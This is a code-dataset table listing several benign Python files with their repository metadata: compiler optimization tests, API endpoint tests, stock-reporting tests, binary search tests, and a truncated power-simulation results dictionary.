hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
857c7fdcb91ccae36881eacab993a8bbafdcd284 | 166 | py | Python | smaug/python/ops/nn.py | mrbeann/smaug | 01ef7892bb25cb08c13cea6125efc1528a8de260 | [
"BSD-3-Clause"
] | 50 | 2020-06-12T19:53:37.000Z | 2022-03-30T15:05:34.000Z | smaug/python/ops/nn.py | mrbeann/smaug | 01ef7892bb25cb08c13cea6125efc1528a8de260 | [
"BSD-3-Clause"
] | 37 | 2020-06-23T17:28:42.000Z | 2021-10-21T05:30:36.000Z | smaug/python/ops/nn.py | mrbeann/smaug | 01ef7892bb25cb08c13cea6125efc1528a8de260 | [
"BSD-3-Clause"
] | 18 | 2020-06-17T19:59:23.000Z | 2022-02-15T07:40:47.000Z | from smaug.python.ops.nn_ops import *
from smaug.python.ops.activation_ops import *
from smaug.python.ops.recurrent import *
from smaug.python.ops.attention import *
| 33.2 | 45 | 0.807229 | 26 | 166 | 5.076923 | 0.346154 | 0.272727 | 0.454545 | 0.545455 | 0.590909 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096386 | 166 | 4 | 46 | 41.5 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
a45d21825a48c6622ab14fe920de6fbbcff9b1b0 | 5,299 | py | Python | Tests/test_interns.py | AlexWaygood/Pyjion | 974bd3cf434fad23fbfa1ea9acf43e3387a5c21f | [
"MIT"
] | null | null | null | Tests/test_interns.py | AlexWaygood/Pyjion | 974bd3cf434fad23fbfa1ea9acf43e3387a5c21f | [
"MIT"
] | null | null | null | Tests/test_interns.py | AlexWaygood/Pyjion | 974bd3cf434fad23fbfa1ea9acf43e3387a5c21f | [
"MIT"
] | null | null | null | """Test the optimization of intern values (-5 - 256)"""
import pyjion
import pyjion.dis
import pytest
def assertNotOptimized(func, capsys) -> None:
assert not func()
assert pyjion.info(func)['compiled']
pyjion.dis.dis(func)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_RICHCMP_TOKEN" in captured.out
def assertOptimized(func, capsys) -> None:
assert not func()
assert pyjion.info(func)['compiled']
pyjion.dis.dis(func)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "MethodTokens.METHOD_RICHCMP_TOKEN" not in captured.out
@pytest.mark.optimization(level=1)
def test_const_compare(capsys):
def _f():
a = 1
b = 2
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_compare_big_left(capsys):
def _f():
a = 1000
b = 2
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_from_builtin(capsys):
def _f():
a = 2
b = int("3")
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_compare_big_right(capsys):
def _f():
a = 1
b = 2000
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_compare_big_both(capsys):
def _f():
a = 1000
b = 2000
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_not_integer(capsys):
def _f():
a = 2
b = "2"
return a == b
assertNotOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_float_compare(capsys):
def _f():
a = 2
b = 1.0
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_dict_key(capsys):
def _f():
a = {0: 'a'}
a[0] = 'b'
return a[0] == 'b'
assert _f()
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_DICT" in captured.out
@pytest.mark.optimization(level=1)
def test_dict_key_invalid_index(capsys):
def _f_subscr():
a = {0: 'a'}
return a[1] == 'b'
with pytest.raises(KeyError):
_f_subscr()
assert pyjion.info(_f_subscr)['compiled']
pyjion.dis.dis(_f_subscr)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_SUBSCR_DICT_HASH" in captured.out
@pytest.mark.optimization(level=1)
def test_list_key(capsys):
def _f():
a = ['a']
a[0] = 'b'
return a[0] == 'b'
assert _f()
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_LIST_I" in captured.out
@pytest.mark.optimization(level=1)
def test_list_key_builtin(capsys):
def _f():
a = list(('a',))
a[0] = 'b'
return a[0] == 'b'
assert _f()
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_LIST_I" in captured.out
@pytest.mark.optimization(level=1)
def test_list_key_non_const(capsys):
def _f(b):
a = ['a']
a[b] = 'b'
return a[b] == 'b'
assert _f(0)
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_LIST_I" not in captured.out
assert "METHOD_STORE_SUBSCR_LIST" in captured.out
@pytest.mark.optimization(level=1)
def test_list_from_builtin_key_non_const(capsys):
def _f(b):
a = list(('a',))
a[b] = 'b'
return a[b] == 'b'
assert _f(0)
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_LIST_I" not in captured.out
assert "METHOD_STORE_SUBSCR_LIST" in captured.out
@pytest.mark.optimization(level=1)
def test_list_key_invalid_index(capsys):
def _f_subscr():
l = [0, 1, 2]
return l[4] == 'b'
with pytest.raises(IndexError):
_f_subscr()
assert pyjion.info(_f_subscr)['compiled']
pyjion.dis.dis(_f_subscr)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_SUBSCR_LIST_I" in captured.out
@pytest.mark.optimization(level=1)
def test_unknown_key_string_const(capsys):
def _f(x):
x['y'] = 'b'
return x['y'] == 'b'
assert _f({})
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_DICT_HASH" in captured.out
@pytest.mark.optimization(level=1)
def test_unknown_int_string_const(capsys):
def _f(x):
x[10] = 'b'
return x[10] == 'b'
assert _f({})
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_SUBSCR_DICT_HASH" in captured.out
| 22.35865 | 66 | 0.63295 | 742 | 5,299 | 4.311321 | 0.101078 | 0.075023 | 0.09753 | 0.135042 | 0.889966 | 0.870272 | 0.8412 | 0.809315 | 0.795874 | 0.774617 | 0 | 0.019041 | 0.236837 | 5,299 | 236 | 67 | 22.45339 | 0.772008 | 0.009247 | 0 | 0.775862 | 0 | 0 | 0.098207 | 0.054157 | 0 | 0 | 0 | 0 | 0.304598 | 1 | 0.195402 | false | 0 | 0.017241 | 0 | 0.304598 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a4750427fba0dda946f61f156202cdd5702827ee | 3,783 | py | Python | Assignments/Assignment 4/fastAPIandStreamlit/test_SentimentAnalyzer.py | akashmdubey/CSYE-Big-Data-Intelligent-Analytics-Raw | 19848f73c3f46719c2daffae4d8e2ef91f372bb6 | [
"MIT"
] | null | null | null | Assignments/Assignment 4/fastAPIandStreamlit/test_SentimentAnalyzer.py | akashmdubey/CSYE-Big-Data-Intelligent-Analytics-Raw | 19848f73c3f46719c2daffae4d8e2ef91f372bb6 | [
"MIT"
] | null | null | null | Assignments/Assignment 4/fastAPIandStreamlit/test_SentimentAnalyzer.py | akashmdubey/CSYE-Big-Data-Intelligent-Analytics-Raw | 19848f73c3f46719c2daffae4d8e2ef91f372bb6 | [
"MIT"
] | null | null | null | #pytest testSentimentAnalyzer.py
from main2 import app
from fastapi.testclient import TestClient
client = TestClient(app)
access_token = "1234567asdfgh"
def test_read_item_bad_token1():
response = client.get("/deanonymize?user_input=NKE")
assert response.status_code == 200
def test_read_item_bad_token2():
response = client.get("/displayPIIEntitywithStar?UserInput=AGEN")
assert response.status_code == 200
def test_read_item_bad_token3():
response = client.get("Authentication?usrName=jayshil&usrPassword=jain")
assert response.status_code == 200
def test_read_item_bad_token4():
response = client.get("/sentiment?UserInput=AGEN")
assert response.status_code == 200
def test_read_item_bad_token5():
response = client.get("/deanonymize?user_input=AGEN")
assert response.status_code == 200
# def test_read_item_bad_token2():
# response = client.get("/getcolumnvalues/FILE_NAME", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token3():
# response = client.get("/getexperimentdatamachine/2/Prep", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token4():
# response = client.get("/knowexpwornstatus/worn", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token5():
# response = client.get("/getdatatool/worn", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token6():
# response = client.get("/knowexppassvisual/no", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token7():
# response = client.get("/getdatavisualinspection/no", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token8():
# response = client.get("/knowexpmachiningfinalized/yes", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token9():
# response = client.get("/getdatamachiningfinalized/no", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_len_item_bad_token1():
# response = client.get("/getexpcnc/1", headers={"access_token": access_token})
# assert len(response.json()) == 1517469
# def test_len_item_bad_token2():
# response = client.get("/getcolumnvalues/FILE_NAME", headers={"access_token": access_token})
# assert len(response.json()) == 18
# def test_len_item_bad_token3():
# response = client.get("/getexperimentdatamachine/2/Prep", headers={"access_token": access_token})
# assert len(response.json()) == 220734
# def test_len_item_bad_token4():
# response = client.get("/knowexpwornstatus/worn", headers={"access_token": access_token})
# assert len(response.json()) == 56
# def test_len_item_bad_token5():
# response = client.get("/getdatatool/worn", headers={"access_token": access_token})
# assert len(response.json()) == 19107642
# def test_len_item_bad_token6():
# response = client.get("/knowexppassvisual/no", headers={"access_token": access_token})
# assert len(response.json()) == 21
# def test_len_item_bad_token7():
# response = client.get("/getdatavisualinspection/no", headers={"access_token": access_token})
# assert len(response.json()) == 5658061
# def test_len_item_bad_token8():
# response = client.get("/knowexpmachiningfinalized/yes", headers={"access_token": access_token})
# assert len(response.json()) == 78
# def test_len_item_bad_token9():
# response = client.get("/getdatamachiningfinalized/no", headers={"access_token": access_token})
# assert len(response.json()) == 3090279
| 47.886076 | 103 | 0.731959 | 468 | 3,783 | 5.617521 | 0.160256 | 0.146444 | 0.142259 | 0.155192 | 0.901483 | 0.865728 | 0.827691 | 0.827691 | 0.827691 | 0.791556 | 0 | 0.034848 | 0.127676 | 3,783 | 78 | 104 | 48.5 | 0.761818 | 0.759715 | 0 | 0.263158 | 0 | 0 | 0.210035 | 0.194866 | 0 | 0 | 0 | 0 | 0.263158 | 1 | 0.263158 | false | 0.052632 | 0.105263 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a480493fa83333bd387be1c036ccdbb3e7706428 | 25 | py | Python | src/riceprint/__init__.py | ssriceboat/riceprint | da9579087bc5641220587f36986129891f62672e | [
"MIT"
] | 6 | 2019-07-16T02:48:47.000Z | 2021-02-05T03:38:47.000Z | src/riceprint/__init__.py | ssriceboat/riceprint | da9579087bc5641220587f36986129891f62672e | [
"MIT"
] | null | null | null | src/riceprint/__init__.py | ssriceboat/riceprint | da9579087bc5641220587f36986129891f62672e | [
"MIT"
] | 1 | 2019-11-01T18:23:20.000Z | 2019-11-01T18:23:20.000Z | from .riceprint import *
| 12.5 | 24 | 0.76 | 3 | 25 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
f13099497b149a3ce83357d3ed155b855d1fb146 | 2,303 | py | Python | custom/ilsgateway/tests/handlers/loss_adjust.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | custom/ilsgateway/tests/handlers/loss_adjust.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | 1 | 2022-03-12T01:03:25.000Z | 2022-03-12T01:03:25.000Z | custom/ilsgateway/tests/handlers/loss_adjust.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | from corehq.apps.commtrack.models import StockState
from custom.ilsgateway.tanzania.reminders import LOSS_ADJUST_CONFIRM, SOH_CONFIRM
from custom.ilsgateway.tests import ILSTestScript
class ILSLossesAdjustmentsTest(ILSTestScript):
def setUp(self):
super(ILSLossesAdjustmentsTest, self).setUp()
def test_losses_adjustments(self):
script = """
5551234 > Hmk Id 400 Dp 569 Ip 678
5551234 < {0}
""".format(unicode(SOH_CONFIRM))
self.run_script(script)
self.run_script(script)
self.assertEqual(StockState.objects.count(), 3)
for ps in StockState.objects.all():
self.assertEqual(self.user_fac1.location.linked_supply_point().get_id, ps.case_id)
self.assertTrue(0 != ps.stock_on_hand)
script = """
5551234 > um id -3 dp -5 ip 13
5551234 < {0}
""".format(unicode(LOSS_ADJUST_CONFIRM))
self.run_script(script)
self.assertEqual(StockState.objects.count(), 3)
self.assertEqual(StockState.objects.get(sql_product__code="id").stock_on_hand, 397)
self.assertEqual(StockState.objects.get(sql_product__code="dp").stock_on_hand, 564)
self.assertEqual(StockState.objects.get(sql_product__code="ip").stock_on_hand, 691)
def test_losses_adjustments_la_word(self):
script = """
5551234 > Hmk Id 400 Dp 569 Ip 678
5551234 < {0}
""".format(unicode(SOH_CONFIRM))
self.run_script(script)
self.run_script(script)
self.assertEqual(StockState.objects.count(), 3)
for ps in StockState.objects.all():
self.assertEqual(self.user_fac1.location.linked_supply_point().get_id, ps.case_id)
self.assertTrue(0 != ps.stock_on_hand)
script = """
5551234 > la id -3 dp -5 ip 13
5551234 < {0}
""".format(unicode(LOSS_ADJUST_CONFIRM))
self.run_script(script)
self.assertEqual(StockState.objects.count(), 3)
self.assertEqual(StockState.objects.get(sql_product__code="id").stock_on_hand, 397)
self.assertEqual(StockState.objects.get(sql_product__code="dp").stock_on_hand, 564)
self.assertEqual(StockState.objects.get(sql_product__code="ip").stock_on_hand, 691)
| 37.145161 | 94 | 0.661746 | 288 | 2,303 | 5.065972 | 0.243056 | 0.123372 | 0.17135 | 0.219328 | 0.788211 | 0.788211 | 0.788211 | 0.788211 | 0.788211 | 0.788211 | 0 | 0.062745 | 0.224924 | 2,303 | 61 | 95 | 37.754098 | 0.754622 | 0 | 0 | 0.782609 | 0 | 0 | 0.14416 | 0 | 0 | 0 | 0 | 0 | 0.304348 | 1 | 0.065217 | false | 0 | 0.065217 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f149759e266f5cc7873b41d88be56c857e237de3 | 4,591 | py | Python | test_python_toolbox/test_binary_search/test.py | hboshnak/python_toolbox | cb9ef64b48f1d03275484d707dc5079b6701ad0c | [
"MIT"
] | 119 | 2015-02-05T17:59:47.000Z | 2022-02-21T22:43:40.000Z | test_python_toolbox/test_binary_search/test.py | hboshnak/python_toolbox | cb9ef64b48f1d03275484d707dc5079b6701ad0c | [
"MIT"
] | 4 | 2019-04-24T14:01:14.000Z | 2020-05-21T12:03:29.000Z | test_python_toolbox/test_binary_search/test.py | hboshnak/python_toolbox | cb9ef64b48f1d03275484d707dc5079b6701ad0c | [
"MIT"
] | 14 | 2015-03-30T06:30:42.000Z | 2021-12-24T23:45:11.000Z | # Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
'''Test module for `binary_search`.'''
from python_toolbox import binary_search
from python_toolbox import nifty_collections
from python_toolbox import misc_tools
def test():
'''Test the basic workings of `binary_search`.'''
my_list = [0, 1, 2, 3, 4]
assert binary_search.binary_search(
my_list,
3,
misc_tools.identity_function,
binary_search.EXACT
) == 3
assert binary_search.binary_search(
my_list,
3.2,
misc_tools.identity_function,
binary_search.CLOSEST
) == 3
assert binary_search.binary_search(
my_list,
3.2,
misc_tools.identity_function,
binary_search.LOW
) == 3
assert binary_search.binary_search(
my_list,
3.2,
misc_tools.identity_function,
binary_search.HIGH
) == 4
assert binary_search.binary_search(
my_list,
3.2,
misc_tools.identity_function,
binary_search.BOTH
) == (3, 4)
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.BOTH
) == (None, 0)
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.LOW
) == None
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.HIGH
) == 0
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.HIGH_OTHERWISE_LOW
) == 0
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.LOW_OTHERWISE_HIGH
) == 0
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.BOTH
) == (4, None)
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.LOW
) == 4
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.HIGH
) == None
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.LOW_OTHERWISE_HIGH
) == 4
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.HIGH_OTHERWISE_LOW
) == 4
assert binary_search.binary_search_by_index(
[(number * 10) for number in my_list],
32,
misc_tools.identity_function,
binary_search.BOTH
) == (3, 4)
assert binary_search.binary_search(
[],
32,
misc_tools.identity_function,
binary_search.BOTH
) == (None, None)
assert binary_search.binary_search(
[],
32,
misc_tools.identity_function,
) == None
def test_single_member():
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.LOW
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.HIGH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.HIGH_IF_BOTH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.LOW_IF_BOTH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.EXACT
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.BOTH
) == (7, 7)
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.CLOSEST
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.CLOSEST_IF_BOTH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.LOW_OTHERWISE_HIGH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.HIGH_OTHERWISE_LOW
) == 7
| 21.65566 | 53 | 0.600305 | 522 | 4,591 | 4.923372 | 0.113027 | 0.401556 | 0.196109 | 0.261479 | 0.907782 | 0.907782 | 0.878988 | 0.841634 | 0.828405 | 0.783268 | 0 | 0.03102 | 0.318885 | 4,591 | 211 | 54 | 21.758294 | 0.790854 | 0.034851 | 0 | 0.907514 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16185 | 1 | 0.011561 | false | 0 | 0.017341 | 0 | 0.028902 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
2d01a52ea812db056044a8b9c093b02af72c2a26 | 68,632 | py | Python | benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMsoplex/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMsoplex/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMsoplex/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.114925,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.292956,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.69972,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.363149,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.628843,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
